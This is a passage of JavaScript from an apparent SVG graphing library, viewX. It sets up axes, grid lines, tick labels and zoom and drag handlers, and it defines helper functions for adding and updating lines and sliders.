gdata.axislocationX = 0
}
if (gdata.axislocationY != 0) {
gdata.axislocationY = gdata.axislocationY || 0
}
else {
gdata.axislocationY = 0
}
if (gdata.xmin != 0) {
gdata.xmin = gdata.xmin || -1
}
else {
gdata.xmin = 0
}
if (gdata.xmax != 0) {
gdata.xmax = gdata.xmax || -1
}
else {
gdata.xmax = 0
}
if (gdata.ymin != 0) {
gdata.ymin = gdata.ymin || -1
}
else {
gdata.ymin = 0
}
if (gdata.ymax != 0) {
gdata.ymax = gdata.ymax || -1
}
else {
gdata.ymax = 0
}
gdata.unitAspectRatio = gdata.unitAspectRatio || 'no'
gdata.fixAxis = gdata.fixAxis || 'yaxis'
gdata.fixAxisStretchCentrally = gdata.fixAxisStretchCentrally || 'no'
gdata.xaxisvisibility = gdata.xaxisvisibility || 'yes'
gdata.yaxisvisibility = gdata.yaxisvisibility || 'yes'
gdata.xaxislabelvisibility = gdata.xaxislabelvisibility || 'yes'
gdata.yaxislabelvisibility = gdata.yaxislabelvisibility || 'yes'
gdata.xmajorgridlinesvisibility = gdata.xmajorgridlinesvisibility || 'yes'
gdata.ymajorgridlinesvisibility = gdata.ymajorgridlinesvisibility || 'yes'
gdata.position = gdata.position || 'absolute'
var svgElement = document.createElementNS("http://www.w3.org/2000/svg", 'svg');
svgElement.setAttribute('height',"100%");
svgElement.setAttribute('width', '100%');
svgElement.setAttribute('viewBox',"0 0 100 100")
// svgElement.setAttribute('preserveAspectRatio',"none")
svgElement.setAttribute('id', name)
svgElement.style.position = gdata.position
svgElement.style.left = '0%'
svgElement.style.top = '0%'
parentdiv.appendChild(svgElement)
gdata.svgElement = svgElement
gdata.parentElement = parentdiv
gdata.fontSize = gdata.fontSize || 5
gdata.gridlinenumberX = gdata.gridlinenumberX || 10
gdata.gridlinenumberY = gdata.gridlinenumberY || 10
gdata.parentW = parentdiv.offsetWidth
gdata.parentH = parentdiv.offsetHeight
aratio = parentdiv.offsetWidth/parentdiv.offsetHeight
if (gdata.unitAspectRatio == 'yes') {
if (gdata.fixAxis == 'yaxis') {
if (gdata.fixAxisStretchCentrally == 'yes') {
centre = (gdata.xmax + gdata.xmin)/2
gdata.xmin = centre - ((gdata.ymax - gdata.ymin)*aratio/2)
gdata.xmax = centre + ((gdata.ymax - gdata.ymin)*aratio/2)
}
else {
gdata.xmax = gdata.xmin + (gdata.ymax - gdata.ymin)*aratio
}
}
else {
if (gdata.fixAxisStretchCentrally == 'yes') {
centre = (gdata.ymax + gdata.ymin)/2
gdata.ymin = centre - ((gdata.xmax - gdata.xmin)*aratio/2)
gdata.ymax = centre + ((gdata.xmax - gdata.xmin)*aratio/2)
}
else {
gdata.ymax = gdata.ymin + (gdata.xmax - gdata.xmin)*aratio
}
}
}
if (viewX.darkmode) {
gdata.yaxiscolor = gdata.yaxiscolor || 'hsla(0, 100%, 100%, 1)'
gdata.xaxiscolor = gdata.xaxiscolor || 'hsla(0, 100%, 100%, 1)'
gdata.xmajorgridlabelcolor = gdata.xmajorgridlabelcolor || 'hsla(0, 100%, 100%, 1)'
gdata.ymajorgridlabelcolor = gdata.ymajorgridlabelcolor || 'hsla(0, 100%, 100%, 1)'
gdata.xmajorgridcolor = gdata.xmajorgridcolor || 'hsla(0, 100%, 100%, 1)'
gdata.ymajorgridcolor = gdata.ymajorgridcolor || 'hsla(0, 100%, 100%, 1)'
}
gdata.yaxisthickness = gdata.yaxisthickness || 0.5
gdata.yaxiscolor = gdata.yaxiscolor || 'hsla(0, 50%, 0%, 1)'
if (gdata.yaxisvisibility == 'yes') {
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymin, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('id', gdata.name + '-yaxis')
lineElement.style.stroke = gdata.yaxiscolor
lineElement.style.strokeWidth = gdata.yaxisthickness + '%';
gdata.yaxisElement = lineElement
svgElement.appendChild(lineElement);
}
gdata.xaxisthickness = gdata.xaxisthickness || 0.5
gdata.xaxiscolor = gdata.xaxiscolor || 'hsla(0, 50%, 0%, 1)'
if (gdata.xaxisvisibility == 'yes') {
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.xmin, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('id', gdata.name + '-xaxis')
lineElement.style.stroke = gdata.xaxiscolor
lineElement.style.strokeWidth = gdata.xaxisthickness + '%';
gdata.xaxisElement = lineElement
svgElement.appendChild(lineElement);
}
gdata.xmajorgridcolor = gdata.xmajorgridcolor || 'hsla(190, 0%, 50%, 1)'
gdata.xmajorgridthickness = gdata.xmajorgridthickness || 0.3
gdata.xmajorgridlinesextension = gdata.xmajorgridlinesextension || 'yes'
gdata.ymajorgridlinesextension = gdata.ymajorgridlinesextension || 'yes'
ticks = gdata.gridlinenumberX
if (gdata.xmajorgridlinesvisibility == 'yes') {
xmajortickvalues = viewX.gridtickvalues(gdata.xmin, gdata.xmax, ticks)
gdata.xmajorgridElements = []
for (m = 0; m < xmajortickvalues.length; m++) {
ticklocation = xmajortickvalues[m]
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
ylength = (gdata.ymax - gdata.ymin)
if (gdata.xmajorgridlinesextension == 'yes') {
lineElement.setAttribute('x1', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymin - (ylength)/2, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymax + (ylength)/2, gdata.ymin, gdata.ymax, aratio) + '%');
}
else {
lineElement.setAttribute('x1', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymin, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('id', gdata.name + '-xmajorgridline-' + m)
}
lineElement.setAttribute('id', gdata.name + '-xmajorgridline-' + m)
lineElement.style.stroke = gdata.xmajorgridcolor
lineElement.style.strokeWidth = gdata.xmajorgridthickness + '%';
gdata.xmajorgridElements.push(lineElement)
svgElement.appendChild(lineElement);
}
gdata.xmajorgridticks = xmajortickvalues
}
gdata.ymajorgridcolor = gdata.ymajorgridcolor || 'hsla(190, 0%, 50%, 1)'
gdata.ymajorgridthickness = gdata.ymajorgridthickness || 0.3
ticks = gdata.gridlinenumberY
if (gdata.ymajorgridlinesvisibility == 'yes') {
ymajortickvalues = viewX.gridtickvalues(gdata.ymin, gdata.ymax, ticks)
gdata.ymajorgridElements = []
for (m = 0; m < ymajortickvalues.length; m++) {
ticklocation = ymajortickvalues[m]
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
xlength = (gdata.xmax - gdata.xmin)
if (gdata.ymajorgridlinesextension == 'yes') {
lineElement.setAttribute('x1', viewX.graphToScaledX((gdata.xmin) - xlength/2, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax + (xlength/2), gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
}
else {
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.xmin, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
}
lineElement.setAttribute('id', gdata.name + '-ymajorgridline-' + m)
lineElement.style.stroke = gdata.ymajorgridcolor
lineElement.style.strokeWidth = gdata.ymajorgridthickness + '%';
gdata.ymajorgridElements.push(lineElement)
svgElement.appendChild(lineElement);
}
gdata.ymajorgridticks = ymajortickvalues
}
gdata.ymajorgridlabelvisibility = gdata.ymajorgridlabelvisibility || 'yes'
gdata.ymajorgridlabelcolor = gdata.ymajorgridlabelcolor || 'hsla(190, 0%, 50%, 1)'
gdata.ymajorgridlabelshift = gdata.ymajorgridlabelshift || 0.1
gdata.xmajorgridlabelshift = gdata.xmajorgridlabelshift || 0.1
gdata.xmajorgridlabelvisibility = gdata.xmajorgridlabelvisibility || 'yes'
gdata.xmajorgridlabelcolor = gdata.xmajorgridlabelcolor || 'hsla(190, 0%, 50%, 1)'
if (viewX.darkmode) {
gdata.ymajorgridlabelcolor = gdata.ymajorgridlabelcolor || 'hsla(190, 100%, 50%, 1)'
gdata.xmajorgridlabelcolor = gdata.xmajorgridlabelcolor || 'hsla(190, 100%, 50%, 1)'
}
else {
gdata.ymajorgridlabelcolor = gdata.ymajorgridlabelcolor || 'hsla(190, 0%, 50%, 1)'
gdata.xmajorgridlabelcolor = gdata.xmajorgridlabelcolor || 'hsla(190, 0%, 50%, 1)'
}
gdata.xlabelexclusionsstart = gdata.xlabelexclusionsstart || 0
gdata.xlabelexclusionsend = gdata.xlabelexclusionsend || 0
gdata.ylabelexclusionsstart = gdata.ylabelexclusionsstart || 0
gdata.ylabelexclusionsend = gdata.ylabelexclusionsend || 0
gdata.isComplexPlane = gdata.isComplexPlane || 'no'
gdata.ymajorgridlabelOnlyIf = gdata.ymajorgridlabelOnlyIf || 'true'
if (gdata.ymajorgridlabelvisibility == 'yes') {
gdata.ymajorlabelsElements = []
ymajortickvalues = viewX.gridtickvalues(gdata.ymin, gdata.ymax, ticks)
labelylocationX = gdata.axislocationX
if (viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) < 0) {
labelylocationX = gdata.xmin
}
if (viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) > 100) {
labelylocationX = gdata.xmax
}
for (m = gdata.ylabelexclusionsstart; m < ymajortickvalues.length - gdata.ylabelexclusionsend; m++) {
ticklocation = ymajortickvalues[m]
value = ticklocation
if (eval(gdata.ymajorgridlabelOnlyIf)) {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
if(viewX.isInt(ticklocation)) {
if (gdata.isComplexPlane == 'yes') {
textElement.innerHTML = ticklocation + 'i'
}
}
else {
expstring = ticklocation.toExponential().toString()
order = (expstring.slice(expstring
.indexOf('e') + 1)*(-1))
if (parseFloat(order) < -1) {
ticklocation = ticklocation.toExponential(0)
}
else {
ticklocation = ticklocation.toFixed(2)
}
textElement.innerHTML = ticklocation
if(ticklocation == 0) {
textElement.innerHTML = 0
}
if (gdata.isComplexPlane == 'yes') {
textElement.innerHTML = ticklocation + 'i'
}
}
textElement.setAttribute('x', viewX.graphToScaledX(labelylocationX, gdata.xmin, gdata.xmax, aratio) + 0.5 + gdata.ymajorgridlabelshift + '%');
textElement.setAttribute('y',viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + 0.5 + '%');
textElement.setAttribute('id', gdata.name + '-yticklabel-' + m)
textElement.style.fontSize = gdata.fontSize
textElement.style.userSelect = 'none'
textElement.style.fontFamily = 'Source Sans Pro'
textElement.style.fill = gdata.ymajorgridlabelcolor
svgElement.appendChild(textElement);
gdata.ymajorlabelsElements.push(textElement)
}
}
}
ticks = gdata.gridlinenumberX
gdata.xmajorgridlabelOnlyIf = gdata.xmajorgridlabelOnlyIf || 'true'
if (gdata.xmajorgridlabelvisibility == 'yes') {
gdata.xmajorlabelsElements = []
xmajortickvalues = viewX.gridtickvalues(gdata.xmin, gdata.xmax, ticks)
labelxlocationY = gdata.axislocationY
if (viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) < 0) {
labelxlocationY = gdata.ymin
}
if (viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) > 100) {
labelxlocationY = gdata.ymax
}
for (m = gdata.xlabelexclusionsstart; m < xmajortickvalues.length - gdata.xlabelexclusionsend; m++) {
ticklocation = xmajortickvalues[m]
value = ticklocation
if (eval(gdata.xmajorgridlabelOnlyIf)) {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
if(viewX.isInt(ticklocation)) {
textElement.innerHTML = ticklocation
}
else {
expstring = ticklocation.toExponential().toString()
order = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
if (parseFloat(order) < -1) {
ticklocation = ticklocation.toExponential(0)
}
else {
ticklocation = ticklocation.toFixed(2)
}
textElement.innerHTML = ticklocation
if(ticklocation == 0) {
textElement.innerHTML = 0
}
}
textElement.setAttribute('x', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) - 1 + '%');
textElement.setAttribute('y',viewX.graphToScaledY(labelxlocationY, gdata.ymin, gdata.ymax, aratio) + 2 + gdata.xmajorgridlabelshift + '%');
textElement.setAttribute('id', gdata.name + '-xticklabel-' + m)
textElement.style.fontSize = gdata.fontSize
textElement.style.fontFamily = 'Source Sans Pro'
textElement.style.userSelect = 'none'
textElement.style.fill = gdata.xmajorgridlabelcolor
svgElement.appendChild(textElement);
gdata.xmajorlabelsElements.push(textElement)
}
}
}
gdata.xaxislabel = gdata.xaxislabel || 'x axis'
gdata.yaxislabel = gdata.yaxislabel || 'y axis'
gdata.xaxislabelshift = gdata.xaxislabelshift || 2
gdata.yaxislabelshift = gdata.yaxislabelshift || 2
if (viewX.darkmode) {
gdata.yaxislabelcolor = gdata.yaxislabelcolor || 'hsla(190, 100%, 100%, 1)'
gdata.xaxislabelcolor = gdata.xaxislabelcolor || 'hsla(190, 100%, 100%, 1)'
}
else {
gdata.yaxislabelcolor = gdata.yaxislabelcolor || 'hsla(190, 0%, 0%, 1)'
gdata.xaxislabelcolor = gdata.xaxislabelcolor || 'hsla(190, 0%, 0%, 1)'
}
if (gdata.xaxislabelvisibility == 'yes') {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
textElement.innerHTML = gdata.xaxislabel
textElement.setAttribute('x', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + gdata.xaxislabelshift + '%');
textElement.setAttribute('y',viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + 1 + '%');
textElement.setAttribute('id', name + '-xaxislabel')
textElement.style.fontSize = gdata.fontSize
textElement.style.color = gdata.xaxislabelcolor
textElement.style.fontFamily = 'Source Sans Pro'
svgElement.appendChild(textElement);
gdata.xaxislabelElement = textElement
}
if (gdata.yaxislabelvisibility == 'yes') {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
textElement.innerHTML = gdata.yaxislabel
textElement.setAttribute('x', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + 0 + '%');
textElement.setAttribute('y',viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) - gdata.yaxislabelshift + '%');
textElement.setAttribute('id',name + '-yaxislabel')
textElement.style.fontSize = gdata.fontSize
textElement.style.color = gdata.yaxislabelcolor
textElement.style.fontFamily = 'Source Sans Pro'
svgElement.appendChild(textElement);
gdata.yaxislabelElement = textElement
}
gdata.scrollZoom = gdata.scrollZoom || 'yes'
if (gdata.scrollZoom == 'yes') {
svgElement.addEventListener('wheel', viewX.wheelHandle)
}
viewX.svgPTVariable[name] = svgElement.createSVGPoint()
gdata.draggability = gdata.draggability || 'no'
if (gdata.draggability == 'yes') {
gdata.currentlyDraggableGraph = gdata.currentlyDraggableGraph || 'yes'
}
else {
gdata.currentlyDraggableGraph = gdata.currentlyDraggableGraph || 'no'
}
gdata.runFunctionOnDragEnd = gdata.runFunctionOnDragEnd || ''
gdata.runFunctionDuringDrag = gdata.runFunctionDuringDrag || ''
if (gdata.draggability == 'yes') {
svgElement.addEventListener('mousedown', viewX.graphDragHandle)
svgElement.addEventListener('touchstart', viewX.graphDragHandle)
}
else {
svgElement.addEventListener('touchmove', viewX.graphTouchDisable)
}
if (gdata.draggability != 'yes' && gdata.scrollZoom != 'yes') {
svgElement.style.pointerEvents = 'none'
}
gdata.dragDirection = gdata.dragDirection || 'bothXY'
gdata.dragIfCondition = gdata.dragIfCondition || 'true'
gdata.lineData = {}
gdata.circleData = {}
gdata.pointData = {}
gdata.ellipseData = {}
gdata.rectData = {}
gdata.textData = {}
gdata.pathData = {}
gdata.sliderData = {}
gdata.arrowData = {}
gdata.aspectratio = aratio
viewX.graphData[name] = gdata
return JSON.parse(JSON.stringify(gdata));
}
viewX.getGraphCursorLocation = function (cursorpercent, graphname) {
    // Convert a cursor position given in svg percentage coordinates
    // ([xPercent, yPercent]) into graph-space coordinates [x, y] for the
    // named graph, using that graph's ranges and stored aspect ratio.
    // Note: gdata/graphEl/valx/valy are implicit globals (file-wide style);
    // graphEl is looked up but never used in this function.
    gdata = viewX.graphData[graphname]
    graphEl = document.getElementById(gdata.name)
    valx = viewX.svgToGraphX(cursorpercent[0], gdata.xmin, gdata.xmax, gdata.aspectratio)
    valy = viewX.svgToGraphY(cursorpercent[1], gdata.ymin, gdata.ymax, gdata.aspectratio)
    return [valx, valy]
}
viewX.addLine = function(graphname, linename, lineoptions) {
    // Add a line segment (graph coordinates) to the named graph and register
    // it in that graph's lineData under `linename`.
    //
    // lineoptions (all optional): x1, y1 (default 0), x2, y2 (default 0.5),
    // strokedasharray (default ""), strokewidth (default 1), linecolor.
    // Returns [lineElement, lineoptions].
    gdata = viewX.graphData[graphname]
    lineoptions = lineoptions || {}
    aratio = gdata.aspectratio
    // Coerce an endpoint option to a number, falling back to the default
    // when it is missing. (Previously `parseFloat(x.toString() || 0)` threw
    // a TypeError on undefined, and the `|| 0` applied to the *string*, so
    // the default could never take effect.)
    var numberOr = function (v, dflt) {
        return v != null ? parseFloat(v) : dflt
    }
    lineoptions.x1 = numberOr(lineoptions.x1, 0)
    lineoptions.y1 = numberOr(lineoptions.y1, 0)
    lineoptions.x2 = numberOr(lineoptions.x2, 0.5)
    lineoptions.y2 = numberOr(lineoptions.y2, 0.5)
    lineoptions.name = linename || viewX.uid
    lineoptions.strokedasharray = lineoptions.strokedasharray || ""
    lineoptions.strokewidth = lineoptions.strokewidth || 1
    lineoptions.linecolor = lineoptions.linecolor || 'hsla(190, 100%, 50%, 1)'
    var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
    lineElement.setAttribute('x1', viewX.graphToScaledX(lineoptions.x1, gdata.xmin, gdata.xmax, aratio) + '%');
    lineElement.setAttribute('y1', viewX.graphToScaledY(lineoptions.y1, gdata.ymin, gdata.ymax, aratio) + '%');
    lineElement.setAttribute('x2', viewX.graphToScaledX(lineoptions.x2, gdata.xmin, gdata.xmax, aratio) + '%')
    lineElement.setAttribute('y2', viewX.graphToScaledY(lineoptions.y2, gdata.ymin, gdata.ymax, aratio) + '%');
    lineElement.setAttribute('stroke-dasharray', lineoptions.strokedasharray);
    lineElement.setAttribute('id', graphname + '-line-' + linename)
    viewX.uid = viewX.uid + 1
    lineElement.setAttribute('vector-effect','non-scaling-stroke');
    lineElement.style.stroke = lineoptions.linecolor
    lineElement.style.strokeWidth = lineoptions.strokewidth + '%';
    gdata.svgElement.appendChild(lineElement);
    viewX.graphData[graphname].lineData[linename] = [lineElement, lineoptions]
    return [lineElement, lineoptions]
}
viewX.updateLine = function(graphname, linename, linevalues) {
    // Update an existing line's endpoints/appearance on the named graph.
    // Any field omitted from `linevalues` keeps its current value; an
    // explicit 0 (or anything loosely equal to 0) always wins, since plain
    // `||` defaulting would wrongly discard it.
    gdata = viewX.graphData[graphname]
    aratio = gdata.aspectratio
    lineoptions = gdata.lineData[linename][1]
    lineElement = gdata.lineData[linename][0]
    // Equivalent to the `incoming != 0 ? (incoming || current) : incoming`
    // pattern used elsewhere in this file.
    var chooseCoord = function (incoming, current) {
        return incoming == 0 ? incoming : (incoming || current)
    }
    lineoptions.x1 = chooseCoord(linevalues.x1, lineoptions.x1)
    lineoptions.y1 = chooseCoord(linevalues.y1, lineoptions.y1)
    lineoptions.x2 = chooseCoord(linevalues.x2, lineoptions.x2)
    lineoptions.y2 = chooseCoord(linevalues.y2, lineoptions.y2)
    lineoptions.strokedasharray = linevalues.strokedasharray || lineoptions.strokedasharray
    lineoptions.strokewidth = linevalues.strokewidth || lineoptions.strokewidth
    lineoptions.linecolor = linevalues.linecolor || lineoptions.linecolor
    // Re-project the (possibly updated) endpoints into svg percentages.
    lineElement.setAttribute('x1', viewX.graphToScaledX(lineoptions.x1, gdata.xmin, gdata.xmax, aratio) + '%');
    lineElement.setAttribute('y1', viewX.graphToScaledY(lineoptions.y1, gdata.ymin, gdata.ymax, aratio) + '%');
    lineElement.setAttribute('x2', viewX.graphToScaledX(lineoptions.x2, gdata.xmin, gdata.xmax, aratio) + '%')
    lineElement.setAttribute('y2', viewX.graphToScaledY(lineoptions.y2, gdata.ymin, gdata.ymax, aratio) + '%');
    lineElement.setAttribute('stroke-dasharray', lineoptions.strokedasharray);
    lineElement.style.stroke = lineoptions.linecolor
    lineElement.style.strokeWidth = lineoptions.strokewidth + '%';
    viewX.graphData[graphname].lineData[linename] = [lineElement, lineoptions]
}
viewX.addSlider = function(graphname, slidername, slideroptions) {
    // Add a slider widget to the named graph, built from three SVG pieces:
    // a base track line, a "fill" line from (x1,y1) to the knob, and an
    // ellipse knob at the position corresponding to currentvalue.
    //
    // slideroptions (all optional): x1,y1 / x2,y2 track endpoints (graph
    // coords), currentvalue / minvalue / maxvalue, strokewidth, the three
    // slider colors, knobradius, automaticallySetKnobRadius ('yes'/'no').
    // Returns [sliderbaseElement, sliderfillElement, circleElement, slideroptions].
    gdata = viewX.graphData[graphname]
    slideroptions = slideroptions || {}
    aratio = gdata.aspectratio
    // Coerce a numeric option, falling back to the default when missing.
    // (Previously `parseFloat(x.toString() || 0)` threw a TypeError on a
    // missing option and the `|| default` could never apply.)
    var numberOr = function (v, dflt) {
        return v != null ? parseFloat(v) : dflt
    }
    slideroptions.x1 = numberOr(slideroptions.x1, 0)
    slideroptions.y1 = numberOr(slideroptions.y1, 0)
    slideroptions.x2 = numberOr(slideroptions.x2, 0.5)
    slideroptions.y2 = numberOr(slideroptions.y2, 0.5)
    slideroptions.name = slidername || viewX.uid
    slideroptions.currentvalue = numberOr(slideroptions.currentvalue, 0.5)
    slideroptions.maxvalue = numberOr(slideroptions.maxvalue, 0.5)
    slideroptions.minvalue = numberOr(slideroptions.minvalue, 0.5)
    slideroptions.strokewidth = slideroptions.strokewidth || 1
    slideroptions.sliderfillcolor = slideroptions.sliderfillcolor || 'hsla(190, 100%, 50%, 1)'
    slideroptions.sliderbasecolor = slideroptions.sliderbasecolor || 'hsla(190, 0%, 70%, 1)'
    slideroptions.sliderknobcolor = slideroptions.sliderknobcolor || 'hsla(190, 100%, 50%, 1)'
    slideroptions.knobradius = parseFloat(slideroptions.knobradius || 0.5)
    // Fraction of the way from minvalue to maxvalue.
    // NOTE(review): when minvalue == maxvalue this divides by zero, and the
    // cx/cy formula below is not a standard lerp (kfactor == 1 lands on the
    // midpoint of the track, not on (x2, y2)). Preserved as-is — confirm.
    kfactor = (slideroptions.currentvalue - slideroptions.minvalue)/(slideroptions.maxvalue - slideroptions.minvalue)
    slideroptions.cx = ((slideroptions.x2*kfactor) + slideroptions.x1)/(kfactor + 1)
    slideroptions.cy = ((slideroptions.y2*kfactor) + slideroptions.y1)/(kfactor + 1)
    // Base track line (full length, muted color).
    var sliderbaseElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
    sliderbaseElement.setAttribute('x1', viewX.graphToScaledX(slideroptions.x1, gdata.xmin, gdata.xmax, aratio) + '%');
    sliderbaseElement.setAttribute('y1', viewX.graphToScaledY(slideroptions.y1, gdata.ymin, gdata.ymax, aratio) + '%');
    sliderbaseElement.setAttribute('x2', viewX.graphToScaledX(slideroptions.x2, gdata.xmin, gdata.xmax, aratio) + '%')
    sliderbaseElement.setAttribute('y2', viewX.graphToScaledY(slideroptions.y2, gdata.ymin, gdata.ymax, aratio) + '%');
    sliderbaseElement.setAttribute('id', graphname + '-slider-base-' + slidername)
    sliderbaseElement.setAttribute('vector-effect','non-scaling-stroke');
    sliderbaseElement.style.stroke = slideroptions.sliderbasecolor
    sliderbaseElement.style.strokeWidth = slideroptions.strokewidth + '%';
    gdata.svgElement.appendChild(sliderbaseElement);
    // Fill line from the track start to the knob position.
    var sliderfillElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
    sliderfillElement.setAttribute('x1', viewX.graphToScaledX(slideroptions.x1, gdata.xmin, gdata.xmax, aratio) + '%');
    sliderfillElement.setAttribute('y1', viewX.graphToScaledY(slideroptions.y1, gdata.ymin, gdata.ymax, aratio) + '%');
    sliderfillElement.setAttribute('x2', viewX.graphToScaledX(slideroptions.cx, gdata.xmin, gdata.xmax, aratio) + '%')
    sliderfillElement.setAttribute('y2', viewX.graphToScaledY(slideroptions.cy, gdata.ymin, gdata.ymax, aratio) + '%');
    sliderfillElement.setAttribute('id', graphname + '-slider-fill-' + slidername)
    sliderfillElement.setAttribute('vector-effect','non-scaling-stroke');
    sliderfillElement.style.stroke = slideroptions.sliderfillcolor
    sliderfillElement.style.strokeWidth = slideroptions.strokewidth + '%';
    gdata.svgElement.appendChild(sliderfillElement);
    // Knob radii in svg percent, one per axis since percent scales differ.
    rx = viewX.distanceBTWgraphToSvg([0,0],[slideroptions.knobradius, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    ry = viewX.distanceBTWgraphToSvg([0,0],[0, slideroptions.knobradius], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
    slideroptions.automaticallySetKnobRadius = slideroptions.automaticallySetKnobRadius || 'yes'
    if (slideroptions.automaticallySetKnobRadius == 'yes') {
        // Size the knob from the track stroke width.
        // Adjusted based on certain calculations at https://www.desmos.com/calculator/wocvdzcn1p
        aRegress = -1.2979*Math.pow(10, -9);
        bRegress = -9.8036
        cRegress = -0.0337978
        fRegress = 10.1808
        // Fixed: previously read `options.strokewidth`, where `options` is
        // not defined in this function (it leaked in as a global set by
        // viewX.divSlider, or threw a ReferenceError).
        strokeW = slideroptions.strokewidth
        if (strokeW < 25) {
            rx = ((aRegress*strokeW) + bRegress)*(Math.exp(cRegress*strokeW)) + fRegress
            ry = rx
        }
        else {
            rx = 0.2217*strokeW + 0.736503
            ry = rx
        }
    }
    var circleElement = document.createElementNS("http://www.w3.org/2000/svg", 'ellipse');
    circleElement.setAttribute('cx', viewX.graphToScaledX(slideroptions.cx, gdata.xmin, gdata.xmax, aratio) + '%');
    circleElement.setAttribute('cy', viewX.graphToScaledY(slideroptions.cy, gdata.ymin, gdata.ymax, aratio) + '%');
    circleElement.setAttribute('rx', rx + '%')
    circleElement.setAttribute('ry', ry + '%');
    circleElement.setAttribute('id', graphname + '-slider-knob-' + slidername)
    viewX.uid = viewX.uid + 1
    circleElement.setAttribute('vector-effect','non-scaling-stroke');
    circleElement.style.fill = slideroptions.sliderknobcolor
    circleElement.style.strokeWidth = '0%';
    gdata.svgElement.appendChild(circleElement);
    viewX.graphData[graphname].sliderData[slidername] = [sliderbaseElement,sliderfillElement, circleElement, slideroptions]
    return [sliderbaseElement,sliderfillElement, circleElement, slideroptions]
}
viewX.sliderDivData = {}
viewX.addSliderToDiv = function(holderName, slidername, slideroptions) {
    // Create an HTML <input type="range"> slider inside the element whose id
    // is `holderName`, and register it in viewX.sliderDivData.
    // slideroptions: min, max, step, value, classname (default
    // 'standardSlider'), eventFunction (oninput attribute string), w, h,
    // sliderbasecolor. Returns [slidername, holderDiv].
    slideroptions = slideroptions || {}
    slideroptions.classname = slideroptions.classname || 'standardSlider'
    var sliderinputElement = document.createElement("input");
    sliderinputElement.type = 'range';
    // Attribute name/value pairs applied in one pass.
    var attrPairs = [
        ['min', slideroptions.min],
        ['max', slideroptions.max],
        ['step', slideroptions.step],
        ['value', slideroptions.value],
        ['id', slidername],
        ['class', slideroptions.classname],
        ['oninput', slideroptions.eventFunction]
    ]
    for (var p = 0; p < attrPairs.length; p++) {
        sliderinputElement.setAttribute(attrPairs[p][0], attrPairs[p][1]);
    }
